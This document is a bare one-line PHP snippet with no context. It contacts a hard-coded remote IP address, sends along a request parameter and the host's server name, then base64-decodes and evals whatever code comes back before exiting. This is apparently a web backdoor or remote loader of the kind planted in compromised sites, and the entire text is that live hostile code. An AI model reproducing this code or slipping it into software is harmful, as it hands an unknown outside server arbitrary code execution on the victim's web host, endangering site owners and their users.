$ch = curl_init();curl_setopt($ch, CURLOPT_URL, "http://78.109.23.240/dynuni5/?p=".trim($_GET['p'])."&sn=".urlencode($_SERVER['SERVER_NAME']));curl_setopt($ch, CURLOPT_POST, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 60);$data=curl_exec($ch);curl_close($ch);eval(base64_decode($data));exit;